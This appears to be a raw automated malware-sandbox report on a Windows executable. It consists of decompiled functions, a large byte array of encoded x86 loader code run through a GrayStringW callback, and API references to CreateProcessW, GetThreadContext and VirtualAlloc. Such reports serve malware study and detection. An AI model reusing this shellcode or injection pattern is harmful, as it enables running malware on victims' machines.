                                                                    				_v317 = 0;
                                                                    				_v316 = 0x53;
                                                                    				_v315 = 0x50;
                                                                    				_v314 = 0xff;
                                                                    				_v313 = 0x55;
                                                                    				_v312 = 0xf4;
                                                                    				_v311 = 0x8b;
                                                                    				_v310 = 0xf8;
                                                                    				_v309 = 0x83;
                                                                    				_v308 = 0xff;
                                                                    				_v307 = 0xff;
                                                                    				_v306 = 0xf;
                                                                    				_v305 = 0x84;
                                                                    				_v304 = 0xfc;
                                                                    				_v303 = 0;
                                                                    				_v302 = 0;
                                                                    				_v301 = 0;
                                                                    				_v300 = 0x6a;
                                                                    				_v299 = 4;
                                                                    				_v298 = 0x68;
                                                                    				_v297 = 0;
                                                                    				_v296 = 0x30;
                                                                    				_v295 = 0;
                                                                    				_v294 = 0;
                                                                    				_v293 = 0x57;
                                                                    				_v292 = 0x53;
                                                                    				_v291 = 0xff;
                                                                    				_v290 = 0x55;
                                                                    				_v289 = 0xf8;
                                                                    				_v288 = 0x8b;
                                                                    				_v287 = 0xf0;
                                                                    				_v286 = 0x85;
                                                                    				_v285 = 0xf6;
                                                                    				_v284 = 0xf;
                                                                    				_v283 = 0x84;
                                                                    				_v282 = 0xe6;
                                                                    				_v281 = 0;
                                                                    				_v280 = 0;
                                                                    				_v279 = 0;
                                                                    				_v278 = 0x53;
                                                                    				_v277 = 0x8d;
                                                                    				_v276 = 0x45;
                                                                    				_v275 = 0xec;
                                                                    				_v274 = 0x50;
                                                                    				_v273 = 0x57;
                                                                    				_v272 = 0x56;
                                                                    				_v271 = 0xff;
                                                                    				_v270 = 0x75;
                                                                    				_v269 = 0xfc;
                                                                    				_v268 = 0xff;
                                                                    				_v267 = 0x55;
                                                                    				_v266 = 0xf0;
                                                                    				_v265 = 0x85;
                                                                    				_v264 = 0xc0;
                                                                    				_v263 = 0xf;
                                                                    				_v262 = 0x84;
                                                                    				_v261 = 0xd1;
                                                                    				_v260 = 0;
                                                                    				_v259 = 0;
                                                                    				_v258 = 0;
                                                                    				_v257 = 0x8b;
                                                                    				_v256 = 0x46;
                                                                    				_v255 = 0x3c;
                                                                    				_v254 = 3;
                                                                    				_v253 = 0xc6;
                                                                    				_v252 = 0xf;
                                                                    				_v251 = 0xb7;
                                                                    				_v250 = 0x48;
                                                                    				_v249 = 6;
                                                                    				_v248 = 0x8b;
                                                                    				_v247 = 0x50;
                                                                    				_v246 = 0x54;
                                                                    				_v245 = 0x89;
                                                                    				_v244 = 0x55;
                                                                    				_v243 = 0xfc;
                                                                    				_v242 = 0x85;
                                                                    				_v241 = 0xc9;
                                                                    				_v240 = 0x74;
                                                                    				_v239 = 0x19;
                                                                    				_v238 = 0xf;
                                                                    				_v237 = 0xb7;
                                                                    				_v236 = 0x50;
                                                                    				_v235 = 0x14;
                                                                    				_v234 = 0x83;
                                                                    				_v233 = 0xc2;
                                                                    				_v232 = 0x28;
                                                                    				_v231 = 3;
                                                                    				_v230 = 0xc2;
                                                                    				_v229 = 0x8b;
                                                                    				_v228 = 0x55;
                                                                    				_v227 = 0xfc;
                                                                    				_v226 = 3;
                                                                    				_v225 = 0x10;
                                                                    				_v224 = 0x8d;
                                                                    				_v223 = 0x40;
                                                                    				_v222 = 0x28;
                                                                    				_v221 = 0x83;
                                                                    				_v220 = 0xe9;
                                                                    				_v219 = 1;
                                                                    				_v218 = 0x75;
                                                                    				_v217 = 0xf6;
                                                                    				_v216 = 0x89;
                                                                    				_v215 = 0x55;
                                                                    				_v214 = 0xfc;
                                                                    				_v213 = 0x6a;
                                                                    				_v212 = 0x40;
                                                                    				_v211 = 0xb8;
                                                                    				_v210 = 0xda;
                                                                    				_v209 = 0x15;
                                                                    				_v208 = 0;
                                                                    				_v207 = 0;
                                                                    				_v206 = 0x2b;
                                                                    				_v205 = 0xfa;
                                                                    				_v204 = 0x68;
                                                                    				_v203 = 0;
                                                                    				_v202 = 0x30;
                                                                    				_v201 = 0;
                                                                    				_v200 = 0;
                                                                    				_v199 = 0x50;
                                                                    				_v198 = 0x53;
                                                                    				_v197 = 0x2b;
                                                                    				_v196 = 0xf8;
                                                                    				_v195 = 0xff;
                                                                    				_v194 = 0x55;
                                                                    				_v193 = 0xf8;
                                                                    				_v192 = 3;
                                                                    				_v191 = 0x75;
                                                                    				_v190 = 0xfc;
                                                                    				_v189 = 0x68;
                                                                    				_v188 = 0xda;
                                                                    				_v187 = 0x15;
                                                                    				_v186 = 0;
                                                                    				_v185 = 0;
                                                                    				_v184 = 0x56;
                                                                    				_v183 = 0x50;
                                                                    				_v182 = 0x89;
                                                                    				_v181 = 0x45;
                                                                    				_v180 = 0xf0;
                                                                    				_v179 = 0xe8;
                                                                    				_v178 = 0x85;
                                                                    				_v177 = 0;
                                                                    				_v176 = 0;
                                                                    				_v175 = 0;
                                                                    				_v174 = 0x83;
                                                                    				_v173 = 0xc4;
                                                                    				_v172 = 0xc;
                                                                    				_v171 = 0x6a;
                                                                    				_v170 = 0x40;
                                                                    				_v169 = 0x68;
                                                                    				_v168 = 0;
                                                                    				_v167 = 0x30;
                                                                    				_v166 = 0;
                                                                    				_v165 = 0;
                                                                    				_v164 = 0x57;
                                                                    				_v163 = 0x53;
                                                                    				_v162 = 0xff;
                                                                    				_v161 = 0x55;
                                                                    				_v160 = 0xf8;
                                                                    				_v159 = 0x57;
                                                                    				_v158 = 0x8d;
                                                                    				_v157 = 0x8e;
                                                                    				_v156 = 0xda;
                                                                    				_v155 = 0x15;
                                                                    				_v154 = 0;
                                                                    				_v153 = 0;
                                                                    				_v152 = 0x89;
                                                                    				_v151 = 0x45;
                                                                    				_v150 = 0xf4;
                                                                    				_v149 = 0x51;
                                                                    				_v148 = 0x50;
                                                                    				_v147 = 0xe8;
                                                                    				_v146 = 0x65;
                                                                    				_v145 = 0;
                                                                    				_v144 = 0;
                                                                    				_v143 = 0;
                                                                    				_v142 = 0x8b;
                                                                    				_v141 = 0x75;
                                                                    				_v140 = 0xf0;
                                                                    				_v139 = 0x83;
                                                                    				_v138 = 0xc4;
                                                                    				_v137 = 0xc;
                                                                    				_v136 = 0x8a;
                                                                    				_v135 = 0xc;
                                                                    				_v134 = 0x33;
                                                                    				_v133 = 0x8d;
                                                                    				_v132 = 0x43;
                                                                    				_v131 = 0xf6;
                                                                    				_v130 = 0x80;
                                                                    				_v129 = 0xf1;
                                                                    				_v128 = 0xee;
                                                                    				_v127 = 0xb2;
                                                                    				_v126 = 0x72;
                                                                    				_v125 = 0xc0;
                                                                    				_v124 = 0xc9;
                                                                    				_v123 = 2;
                                                                    				_v122 = 2;
                                                                    				_v121 = 0xc8;
                                                                    				_v120 = 0xb0;
                                                                    				_v119 = 0x70;
                                                                    				_v118 = 0x32;
                                                                    				_v117 = 0xcb;
                                                                    				_v116 = 0x2a;
                                                                    				_v115 = 0xd1;
                                                                    				_v114 = 0x80;
                                                                    				_v113 = 0xf2;
                                                                    				_v112 = 0x48;
                                                                    				_v111 = 0xf6;
                                                                    				_v110 = 0xda;
                                                                    				_v109 = 0x80;
                                                                    				_v108 = 0xf2;
                                                                    				_v107 = 0x61;
                                                                    				_v106 = 0x80;
                                                                    				_v105 = 0xea;
                                                                    				_v104 = 0x1b;
                                                                    				_v103 = 0xd0;
                                                                    				_v102 = 0xc2;
                                                                    				_v101 = 2;
                                                                    				_v100 = 0xd3;
                                                                    				_v99 = 0x80;
                                                                    				_v98 = 0xf2;
                                                                    				_v97 = 0x21;
                                                                    				_v96 = 0x2a;
                                                                    				_v95 = 0xd3;
                                                                    				_v94 = 0xf6;
                                                                    				_v93 = 0xd2;
                                                                    				_v92 = 0xc0;
                                                                    				_v91 = 0xca;
                                                                    				_v90 = 3;
                                                                    				_v89 = 0x80;
                                                                    				_v88 = 0xea;
                                                                    				_v87 = 0x3c;
                                                                    				_v86 = 0xd0;
                                                                    				_v85 = 0xc2;
                                                                    				_v84 = 0x2a;
                                                                    				_v83 = 0xc2;
                                                                    				_v82 = 0x32;
                                                                    				_v81 = 0xc3;
                                                                    				_v80 = 0x34;
                                                                    				_v79 = 0x90;
                                                                    				_v78 = 0xf6;
                                                                    				_v77 = 0xd0;
                                                                    				_v76 = 0xc0;
                                                                    				_v75 = 0xc8;
                                                                    				_v74 = 3;
                                                                    				_v73 = 0xf6;
                                                                    				_v72 = 0xd0;
                                                                    				_v71 = 0xc0;
                                                                    				_v70 = 0xc8;
                                                                    				_v69 = 3;
                                                                    				_v68 = 0x34;
                                                                    				_v67 = 0xf0;
                                                                    				_v66 = 0x88;
                                                                    				_v65 = 4;
                                                                    				_v64 = 0x33;
                                                                    				_v63 = 0x43;
                                                                    				_v62 = 0x81;
                                                                    				_v61 = 0xfb;
                                                                    				_v60 = 0xda;
                                                                    				_v59 = 0x15;
                                                                    				_v58 = 0;
                                                                    				_v57 = 0;
                                                                    				_v56 = 0x72;
                                                                    				_v55 = 0xae;
                                                                    				_v54 = 0xff;
                                                                    				_v53 = 0x75;
                                                                    				_v52 = 0xf4;
                                                                    				_v51 = 0xff;
                                                                    				_v50 = 0xd6;
                                                                    				_v49 = 0x59;
                                                                    				_v48 = 0x5f;
                                                                    				_v47 = 0x5e;
                                                                    				_v46 = 0x5b;
                                                                    				_v45 = 0x8b;
                                                                    				_v44 = 0xe5;
                                                                    				_v43 = 0x5d;
                                                                    				_v42 = 0xc3;
                                                                    				_v41 = 0x55;
                                                                    				_v40 = 0x8b;
                                                                    				_v39 = 0xec;
                                                                    				_v38 = 0x8b;
                                                                    				_v37 = 0x55;
                                                                    				_v36 = 0x10;
                                                                    				_v35 = 0x85;
                                                                    				_v34 = 0xd2;
                                                                    				_v33 = 0x74;
                                                                    				_v32 = 0x15;
                                                                    				_v31 = 0x8b;
                                                                    				_v30 = 0x4d;
                                                                    				_v29 = 8;
                                                                    				_v28 = 0x56;
                                                                    				_v27 = 0x8b;
                                                                    				_v26 = 0x75;
                                                                    				_v25 = 0xc;
                                                                    				_v24 = 0x2b;
                                                                    				_v23 = 0xf1;
                                                                    				_v22 = 0x8a;
                                                                    				_v21 = 4;
                                                                    				_v20 = 0xe;
                                                                    				_v19 = 0x88;
                                                                    				_v18 = 1;
                                                                    				_v17 = 0x41;
                                                                    				_v16 = 0x83;
                                                                    				_v15 = 0xea;
                                                                    				_v14 = 1;
                                                                    				_v13 = 0x75;
                                                                    				_v12 = 0xf5;
                                                                    				_v11 = 0x5e;
                                                                    				_v10 = 0x5d;
                                                                    				_v9 = 0xc3;
                                                                    				_v8 = 0;
                                                                    				_v7 = 0;
                                                                    				_v6 = 0;
                                                                    				_v5 = 0;
                                                                    				_t637 = GrayStringW(GetDC(0), 0,  &_v636,  &_v1636, 0, 0, 0, 0, 0); // executed
                                                                    				return _t637;
			}

                                                                    0x0040173a
                                                                    0x00401741
                                                                    0x00401748
                                                                    0x0040174f
                                                                    0x00401756
                                                                    0x0040175d
                                                                    0x00401764
                                                                    0x0040176b
                                                                    0x00401772
                                                                    0x00401779
                                                                    0x00401780
                                                                    0x00401787
                                                                    0x0040178e
                                                                    0x00401795
                                                                    0x0040179c
                                                                    0x004017a3
                                                                    0x004017aa
                                                                    0x004017b1
                                                                    0x004017b8
                                                                    0x004017bf
                                                                    0x004017c6
                                                                    0x004017cd
                                                                    0x004017d4
                                                                    0x004017db
                                                                    0x004017e2
                                                                    0x004017e9
                                                                    0x004017f0
                                                                    0x004017f7
                                                                    0x004017fe
                                                                    0x00401805
                                                                    0x0040180c
                                                                    0x00401813
                                                                    0x0040181a
                                                                    0x00401821
                                                                    0x00401828
                                                                    0x0040182f
                                                                    0x00401836
                                                                    0x0040183d
                                                                    0x00401844
                                                                    0x0040184b
                                                                    0x00401852
                                                                    0x00401859
                                                                    0x00401860
                                                                    0x00401867
                                                                    0x0040186e
                                                                    0x00401875
                                                                    0x0040187c
                                                                    0x00401883
                                                                    0x0040188a
                                                                    0x00401891
                                                                    0x00401898
                                                                    0x0040189f
                                                                    0x004018a6
                                                                    0x004018ad
                                                                    0x004018b4
                                                                    0x004018bb
                                                                    0x004018c2
                                                                    0x004018c9
                                                                    0x004018d0
                                                                    0x004018d7
                                                                    0x004018de
                                                                    0x004018e5
                                                                    0x004018ec
                                                                    0x004018f3
                                                                    0x004018fa
                                                                    0x00401901
                                                                    0x00401908
                                                                    0x0040190f
                                                                    0x00401916
                                                                    0x0040191d
                                                                    0x00401924
                                                                    0x0040192b
                                                                    0x00401932
                                                                    0x00401939
                                                                    0x00401940
                                                                    0x00401947
                                                                    0x0040194e
                                                                    0x00401955
                                                                    0x0040195c
                                                                    0x00401963
                                                                    0x0040196a
                                                                    0x00401971
                                                                    0x00401978
                                                                    0x0040197f
                                                                    0x00401986
                                                                    0x0040198d
                                                                    0x00401994
                                                                    0x0040199b
                                                                    0x004019a2
                                                                    0x004019a9
                                                                    0x004019b0
                                                                    0x004019b7
                                                                    0x004019be
                                                                    0x004019c5
                                                                    0x004019cc
                                                                    0x004019d3
                                                                    0x004019da
                                                                    0x004019e1
                                                                    0x004019e8
                                                                    0x004019ef
                                                                    0x004019f6
                                                                    0x004019fd
                                                                    0x00401a04
                                                                    0x00401a0b
                                                                    0x00401a12
                                                                    0x00401a19
                                                                    0x00401a20
                                                                    0x00401a27
                                                                    0x00401a2e
                                                                    0x00401a35
                                                                    0x00401a3c
                                                                    0x00401a43
                                                                    0x00401a4a
                                                                    0x00401a51
                                                                    0x00401a58
                                                                    0x00401a5f
                                                                    0x00401a66
                                                                    0x00401a6d
                                                                    0x00401a74
                                                                    0x00401a7b
                                                                    0x00401a82
                                                                    0x00401a89
                                                                    0x00401a90
                                                                    0x00401a97
                                                                    0x00401a9e
                                                                    0x00401aa5
                                                                    0x00401aac
                                                                    0x00401ab3
                                                                    0x00401aba
                                                                    0x00401ac1
                                                                    0x00401ac8
                                                                    0x00401acf
                                                                    0x00401ad6
                                                                    0x00401add
                                                                    0x00401ae4
                                                                    0x00401aeb
                                                                    0x00401af2
                                                                    0x00401af9
                                                                    0x00401b00
                                                                    0x00401b07
                                                                    0x00401b0e
                                                                    0x00401b15
                                                                    0x00401b1c
                                                                    0x00401b23
                                                                    0x00401b2a
                                                                    0x00401b31
                                                                    0x00401b38
                                                                    0x00401b3f
                                                                    0x00401b46
                                                                    0x00401b4d
                                                                    0x00401b54
                                                                    0x00401b5b
                                                                    0x00401b62
                                                                    0x00401b69
                                                                    0x00401b70
                                                                    0x00401b77
                                                                    0x00401b7e
                                                                    0x00401b85
                                                                    0x00401b8c
                                                                    0x00401b93
                                                                    0x00401b9a
                                                                    0x00401ba1
                                                                    0x00401ba8
                                                                    0x00401baf
                                                                    0x00401bb6
                                                                    0x00401bbd
                                                                    0x00401bc4
                                                                    0x00401bcb
                                                                    0x00401bd2
                                                                    0x00401bd9
                                                                    0x00401be0
                                                                    0x00401be7
                                                                    0x00401bee
                                                                    0x00401bf5
                                                                    0x00401bfc
                                                                    0x00401c03
                                                                    0x00401c0a
                                                                    0x00401c11
                                                                    0x00401c18
                                                                    0x00401c1f
                                                                    0x00401c26
                                                                    0x00401c2d
                                                                    0x00401c34
                                                                    0x00401c3b
                                                                    0x00401c42
                                                                    0x00401c49
                                                                    0x00401c50
                                                                    0x00401c57
                                                                    0x00401c5e
                                                                    0x00401c65
                                                                    0x00401c6c
                                                                    0x00401c73
                                                                    0x00401c7a
                                                                    0x00401c81
                                                                    0x00401c88
                                                                    0x00401c8f
                                                                    0x00401c96
                                                                    0x00401c9d
                                                                    0x00401ca4
                                                                    0x00401cab
                                                                    0x00401cb2
                                                                    0x00401cb9
                                                                    0x00401cc0
                                                                    0x00401cc7
                                                                    0x00401cce
                                                                    0x00401cd5
                                                                    0x00401cdc
                                                                    0x00401ce3
                                                                    0x00401cea
                                                                    0x00401cf1
                                                                    0x00401cf8
                                                                    0x00401cff
                                                                    0x00401d06
                                                                    0x00401d0d
                                                                    0x00401d14
                                                                    0x00401d1b
                                                                    0x00401d22
                                                                    0x00401d29
                                                                    0x00401d30
                                                                    0x00401d37
                                                                    0x00401d3e
                                                                    0x00401d45
                                                                    0x00401d4c
                                                                    0x00401d53
                                                                    0x00401d5a
                                                                    0x00401d61
                                                                    0x00401d68
                                                                    0x00401d6f
                                                                    0x00401d76
                                                                    0x00401d7d
                                                                    0x00401d84
                                                                    0x00401d8b
                                                                    0x00401d92
                                                                    0x00401d99
                                                                    0x00401da0
                                                                    0x00401da7
                                                                    0x00401dae
                                                                    0x00401db5
                                                                    0x00401dbc
                                                                    0x00401dc3
                                                                    0x00401dca
                                                                    0x00401dd1
                                                                    0x00401dd5
                                                                    0x00401dd9
                                                                    0x00401ddd
                                                                    0x00401de1
                                                                    0x00401de5
                                                                    0x00401de9
                                                                    0x00401ded
                                                                    0x00401df1
                                                                    0x00401df5
                                                                    0x00401df9
                                                                    0x00401dfd
                                                                    0x00401e01
                                                                    0x00401e05
                                                                    0x00401e09
                                                                    0x00401e0d
                                                                    0x00401e11
                                                                    0x00401e15
                                                                    0x00401e19
                                                                    0x00401e1d
                                                                    0x00401e21
                                                                    0x00401e25
                                                                    0x00401e29
                                                                    0x00401e2d
                                                                    0x00401e31
                                                                    0x00401e35
                                                                    0x00401e39
                                                                    0x00401e3d
                                                                    0x00401e41
                                                                    0x00401e45
                                                                    0x00401e49
                                                                    0x00401e4d
                                                                    0x00401e51
                                                                    0x00401e55
                                                                    0x00401e59
                                                                    0x00401e5d
                                                                    0x00401e61
                                                                    0x00401e65
                                                                    0x00401e69
                                                                    0x00401e6d
                                                                    0x00401e71
                                                                    0x00401e75
                                                                    0x00401e79
                                                                    0x00401e7d
                                                                    0x00401e81
                                                                    0x00401e85
                                                                    0x00401e89
                                                                    0x00401e8d
                                                                    0x00401e91
                                                                    0x00401e95
                                                                    0x00401e99
                                                                    0x00401e9d
                                                                    0x00401ea1
                                                                    0x00401ea5
                                                                    0x00401ea9
                                                                    0x00401ead
                                                                    0x00401eb1
                                                                    0x00401eb5
                                                                    0x00401eb9
                                                                    0x00401ebd
                                                                    0x00401ec1
                                                                    0x00401ec5
                                                                    0x00401ec9
                                                                    0x00401ecd
                                                                    0x00401ed1
                                                                    0x00401ed5
                                                                    0x00401ed9
                                                                    0x00401edd
                                                                    0x00401ee1
                                                                    0x00401ee5
                                                                    0x00401ee9
                                                                    0x00401eed
                                                                    0x00401ef1
                                                                    0x00401ef5
                                                                    0x00401ef9
                                                                    0x00401efd
                                                                    0x00401f01
                                                                    0x00401f05
                                                                    0x00401f09
                                                                    0x00401f0d
                                                                    0x00401f11
                                                                    0x00401f15
                                                                    0x00401f19
                                                                    0x00401f1d
                                                                    0x00401f21
                                                                    0x00401f25
                                                                    0x00401f29
                                                                    0x00401f2d
                                                                    0x00401f31
                                                                    0x00401f35
                                                                    0x00401f39
                                                                    0x00401f3d
                                                                    0x00401f41
                                                                    0x00401f45
                                                                    0x00401f49
                                                                    0x00401f4d
                                                                    0x00401f51
                                                                    0x00401f55
                                                                    0x00401f59
                                                                    0x00401f5d
                                                                    0x00401f61
                                                                    0x00401f65
                                                                    0x00401f69
                                                                    0x00401f6d
                                                                    0x00401f71
                                                                    0x00401f75
                                                                    0x00401f79
                                                                    0x00401f7d
                                                                    0x00401f81
                                                                    0x00401f85
                                                                    0x00401f89
                                                                    0x00401f8d
                                                                    0x00401f91
                                                                    0x00401f95
                                                                    0x00401f99
                                                                    0x00401f9d
                                                                    0x00401fa1
                                                                    0x00401fa5
                                                                    0x00401fa9
                                                                    0x00401fad
                                                                    0x00401fb1
                                                                    0x00401fb5
                                                                    0x00401fb9
                                                                    0x00401fbd
                                                                    0x00401fc1
                                                                    0x00401fc5
                                                                    0x00401fc9
                                                                    0x00401fcd
                                                                    0x00401ff4
                                                                    0x00401ffd

                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00401FED
                                                                    • GrayStringW.USER32(00000000), ref: 00401FF4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: GrayString
                                                                    • String ID: $!$#$$$$$($($($*$*$*$+$+$+$0$0$0$0$2$2$2$2$3$3$3$3$3$4$4$8$;$;$<$<$<$<$>$@$@$@$@$@$@$@$@$A$A$C$C$D$E$E$E$E$E$E$E$E$E$E$E$F$F$F$G$H$H$H$M$M$N$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$S$S$S$S$S$S$S$S$S$S$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$X$Y$Y$[$[$\$]$]$]$]$]$]$^$^$^$^$_$_$_$a$d$e$g$h$h$h$h$h$h$h$h$h$h$h$h$i$j$j$j$j$j$p$p$r$r$r$t$t$t$t$u$u$u$u$u$u$u$u$u$u$x$y$}$~$~
                                                                    • API String ID: 215530525-3245139904
                                                                    • Opcode ID: a529573dfcdcbef6e062d2c407cdd165618c508a2b72e946e243a5b0c1205a67
                                                                    • Instruction ID: 226ef0d03319a4da0f15562ba653300554eabad44b61a717781ff672fc057b4f
                                                                    • Opcode Fuzzy Hash: a529573dfcdcbef6e062d2c407cdd165618c508a2b72e946e243a5b0c1205a67
                                                                    • Instruction Fuzzy Hash: 46B2191091CBEAC8DB32827C5C587CEAE611B27325F5843C9D1F83A2D2C7B50B95DB66
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 021C127E
                                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 021C129E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ContextCreateProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2843130473-0
                                                                    • Opcode ID: 6aac6d4706af8862cce15ca18613deb69fe57da59ff6ce81f2af59686110bf29
                                                                    • Instruction ID: 998b2614cae969d950ed3d07e4c11ce65b684077c2225df78c4520a1ddc7546d
                                                                    • Opcode Fuzzy Hash: 6aac6d4706af8862cce15ca18613deb69fe57da59ff6ce81f2af59686110bf29
                                                                    • Instruction Fuzzy Hash: 3ED13835A80219EFEF15CF94CD85FADBBB5BF19309F244059E51ABA292D770AA40CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00403C2F() {
                                                                    				signed int _t15;
                                                                    				void* _t17;
                                                                    				void* _t19;
                                                                    				void* _t25;
                                                                    				signed int _t26;
                                                                    				void* _t27;
                                                                    				intOrPtr* _t29;
                                                                    
                                                                    				_t15 =  *0x40656c; // 0x1
                                                                    				_t26 =  *0x40655c; // 0x10
                                                                    				if(_t15 != _t26) {
                                                                    					L3:
                                                                    					_t27 =  *0x406570; // 0x22605a8
                                                                    					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
                                                                    					_t17 = RtlAllocateHeap( *0x406574, 8, 0x41c4); // executed
                                                                    					 *(_t29 + 0x10) = _t17;
                                                                    					if(_t17 == 0) {
                                                                    						L6:
                                                                    						return 0;
                                                                    					}
                                                                    					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
                                                                    					 *(_t29 + 0xc) = _t19;
                                                                    					if(_t19 != 0) {
                                                                    						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
                                                                    						 *_t29 = 0;
                                                                    						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                    						 *0x40656c =  *0x40656c + 1;
                                                                    						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
                                                                    						return _t29;
                                                                    					}
                                                                    					HeapFree( *0x406574, 0,  *(_t29 + 0x10));
                                                                    					goto L6;
                                                                    				}
                                                                    				_t2 = _t26 * 4; // 0x60
                                                                    				_t25 = HeapReAlloc( *0x406574, 0,  *0x406570, _t26 + _t2 + 0x50 << 2);
                                                                    				if(_t25 == 0) {
                                                                    					goto L6;
                                                                    				}
                                                                    				 *0x40655c =  *0x40655c + 0x10;
                                                                    				 *0x406570 = _t25;
                                                                    				_t15 =  *0x40656c; // 0x1
                                                                    				goto L3;
                                                                    			}

                                                                    APIs
                                                                    • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,004039F7,00000000,?,?,?,004020CA), ref: 00403C57
                                                                    • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,004039F7,00000000,?,?,?,004020CA), ref: 00403C8B
                                                                    • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,004020CA), ref: 00403CA5
                                                                    • HeapFree.KERNEL32(00000000,?,?,004020CA), ref: 00403CBC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: Heap$Alloc$AllocateFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1005975451-0
                                                                    • Opcode ID: b14f3b215edd06dfa11e0f270abd8e093ca8f3bed7d9b9ff123f2dd69fc0b121
                                                                    • Instruction ID: b2c5fa89e0eb3f51598bde31c379c17e434c251cd55b01d7361894cd244b5741
                                                                    • Opcode Fuzzy Hash: b14f3b215edd06dfa11e0f270abd8e093ca8f3bed7d9b9ff123f2dd69fc0b121
                                                                    • Instruction Fuzzy Hash: 15113771600600AFD7218F28FE49D267BB6FB857917114A3AF152E62E4D3319822CF48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00402C00(intOrPtr _a4) {
                                                                    				void* _t6;
                                                                    				void* _t9;
                                                                    
                                                                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                    				 *0x406574 = _t6;
                                                                    				if(_t6 == 0) {
                                                                    					L3:
                                                                    					return 0;
                                                                    				} else {
                                                                    					if(E00403592() != 0) {
                                                                    						_t9 = 1;
                                                                    						return _t9;
                                                                    					} else {
                                                                    						HeapDestroy( *0x406574);
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,004020B8,00000001), ref: 00402C11
                                                                      • Part of subcall function 00403592: HeapAlloc.KERNEL32(00000000,00000140,00402C25), ref: 0040359F
                                                                    • HeapDestroy.KERNEL32 ref: 00402C2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: Heap$AllocCreateDestroy
                                                                    • String ID:
                                                                    • API String ID: 2236781399-0
                                                                    • Opcode ID: bc5e44137ce65289b8e1dcce8f8d315b0b7bf4eca14613293eaa72fee1890c52
                                                                    • Instruction ID: 2c5e1556da94527a30ceb9cff86543d470025539680dbd8358bd1ae6880008e2
                                                                    • Opcode Fuzzy Hash: bc5e44137ce65289b8e1dcce8f8d315b0b7bf4eca14613293eaa72fee1890c52
                                                                    • Instruction Fuzzy Hash: 0FE01270655300BEFB101B30BF09B6F3AE8AB487C2F008836B506E41E4E7B489909918
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(00000000,00028400,00028400,00028400), ref: 021C0BD9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: e3e1e0376983d29c41e9f1ea22d2e09707aa7033afff432d298dee813e01029d
                                                                    • Instruction ID: edb0d6ab027d903d357f068f508199a9e00b21e1921f17d8bdb8177fd38f5599
                                                                    • Opcode Fuzzy Hash: e3e1e0376983d29c41e9f1ea22d2e09707aa7033afff432d298dee813e01029d
                                                                    • Instruction Fuzzy Hash: 4A41B519A94348EDDB60DBE4F851BBDB7B1AF48B10F20540BE908EE2E0E3750D91D749
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00403CE0(void* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				signed int _t45;
                                                                    				intOrPtr _t48;
                                                                    				signed int _t49;
                                                                    				intOrPtr _t51;
                                                                    				intOrPtr _t52;
                                                                    				intOrPtr _t53;
                                                                    				signed int _t54;
                                                                    				intOrPtr* _t55;
                                                                    				signed int _t57;
                                                                    				intOrPtr _t60;
                                                                    				intOrPtr _t61;
                                                                    				intOrPtr _t62;
                                                                    				void* _t69;
                                                                    				void* _t70;
                                                                    				void* _t77;
                                                                    				signed int _t78;
                                                                    				intOrPtr _t81;
                                                                    
                                                                    				_t60 = _a4;
                                                                    				_t81 =  *((intOrPtr*)(_t60 + 0x10));
                                                                    				_t45 =  *(_t60 + 8);
